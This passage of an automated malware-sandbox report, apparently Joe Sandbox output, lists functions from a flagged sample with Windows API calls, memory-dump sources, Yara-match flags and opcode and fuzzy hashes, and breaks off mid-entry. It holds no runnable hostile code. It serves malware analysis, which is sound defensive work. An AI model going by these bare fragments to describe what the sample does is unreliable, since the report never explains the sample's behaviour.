                                                              • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                              • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                              • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                              • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024A6F21,?,?,00000008,?,?,024AF3E2,00000000), ref: 024A7153
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                              • Instruction ID: b4bead52b7adc43ab3d09d59a5431fe39278b2192eb71e8ab72593d9b896b60c
                                                              • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                              • Instruction Fuzzy Hash: 7DB16F312106089FD725CF28C496B69BBE1FF55368F298659E89ACF3A1C335D992CF40
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2955987475-0
                                                              • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                              • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                              • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                              • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024AB900
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2955987475-0
                                                              • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                              • Instruction ID: 894950bf890e9071168e19fddc440ec9a2c25e4b603c106ed9c8f004616b7ee1
                                                              • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                              • Instruction Fuzzy Hash: BD21BE7295020AABDF24AE25DC61BBA77ADFF24318F00017FED01D6251EB799944DB50
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                              • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                              • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                              • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024A0A1C,?,024ABC89,00000000,?,?,?), ref: 024AB5A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                              • Instruction ID: 18d74d8b277ae358da7247cbfdf9b29731e7ca9d151032ff60f35e7071ef560c
                                                              • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                              • Instruction Fuzzy Hash: 3311E53A2007059FDB189F39C8A16BBBB92FF9475CB19482EDA4687B40D771B542CB40
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale_free
                                                              • String ID:
                                                              • API String ID: 787680540-0
                                                              • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                              • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                              • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                              • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024AB87A,00000000,00000000,?), ref: 024ABB08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale_free
                                                              • String ID:
                                                              • API String ID: 787680540-0
                                                              • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                              • Instruction ID: 41c5c3d13b33bb4f1284a6ef611b21afcf9bf1ffa1d530003e2f9a81f71f35ca
                                                              • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                              • Instruction Fuzzy Hash: F3F0F432A11115ABDB289A25CC55BBBB768FB6071CF04046AED06A3684EB70BE42C6D0
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                              • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                              • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                              • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024A0A1C,?,024ABC4D,024A0A1C,?,?,?,?,?,024A0A1C,?,?), ref: 024AB61B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                              • Instruction ID: a185d91d498a99ac7c5dba8311b9715d276e1c5d042b0f2b32af02cac09110ce
                                                              • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                              • Instruction Fuzzy Hash: 17F0F6363007045FDB245F39DCA1B7B7B95EF9076CF15442EFA058B650D7B198029B44
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024A047A,?,00000004), ref: 024A547A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                              • Instruction ID: 3a034e8758d3c2566f8fc9f6e201ee483d0d5593cc91ff2f68cd3d195e4bbae0
                                                              • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                              • Instruction Fuzzy Hash: FAF02B31A80318BFDB015F51CD01F6E7B26EF14F02F80411AFD0566290DA718D20EB89
                                                              APIs
                                                                • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                              • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                              • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                              • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                              • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                              APIs
                                                                • Part of subcall function 0249E654: RtlEnterCriticalSection.NTDLL(02020DAF), ref: 0249E663
                                                              • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024A506C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                              • Instruction ID: 275d1a892d870f1ca76b650ef4b51d2880c8a371f56df8ba81daaf226e8273a2
                                                              • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                              • Instruction Fuzzy Hash: A9F03C32A20304DBEB10EF69D905B5D7BE1AF15721F10416AF900DB2A1CB759944CF49
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                              • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                              • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                              • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024ABCAB,024A0A1C,?,?,?,?,?,024A0A1C,?,?,?), ref: 024AB520
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                              • String ID:
                                                              • API String ID: 2016158738-0
                                                              • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                              • Instruction ID: 3579ef75552df262562f64ed2d03fba6be7e3c6fede81762f97e666ce92e754b
                                                              • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                              • Instruction Fuzzy Hash: 9BF0553A30020857CB089F36DC2476BBF90EFC1B54B0A005EEF098B290C3719842C790
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                              • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                              • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00410672,0247FE60), ref: 024808D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                              • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                              • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                              • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                              • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                              • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                              • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                              • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                              • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                              • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                              • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                              • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                              • Instruction ID: e114a8e1dd15bc6f83e9dece8229249b59545efe4b518ba0d7b5843e99a70b87
                                                              • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                              • Instruction Fuzzy Hash: 40D1D7B22185A20EDF2D4A3E847013BFFE1AA421A530D479FD4F7CA6C2EE24D555D760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                              • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                              • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                              • Instruction ID: 2ff1cd91a19711ef11f2096e5f873511c357c4e869f8aec352f0182ea9432992
                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                              • Instruction Fuzzy Hash: A59134722090A34AEF6A463E847553FFFE15A432A530A079FD4F3CA2C5EF24D595DA20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                              • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                              • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                              • Instruction ID: 58bc820066537845c5dfd8eb285c971aa4630ab958f1ebaf903d668fe5e821c0
                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                              • Instruction Fuzzy Hash: 759130722090A34AEF69467E857853FFFE15A832A530A079FD4F2CA2C5FF24C565D620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                              • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                              • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                              • Instruction ID: ceb6ed164c2703431933d3f107e67ce29aef7bf2bdd6105665dd5e4c1ef5a482
                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                              • Instruction Fuzzy Hash: AF9151B22190A30AEF69463D857453FFFE19A421A570A079FE4F3CB2C5EF248554D720
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                              • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                              • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
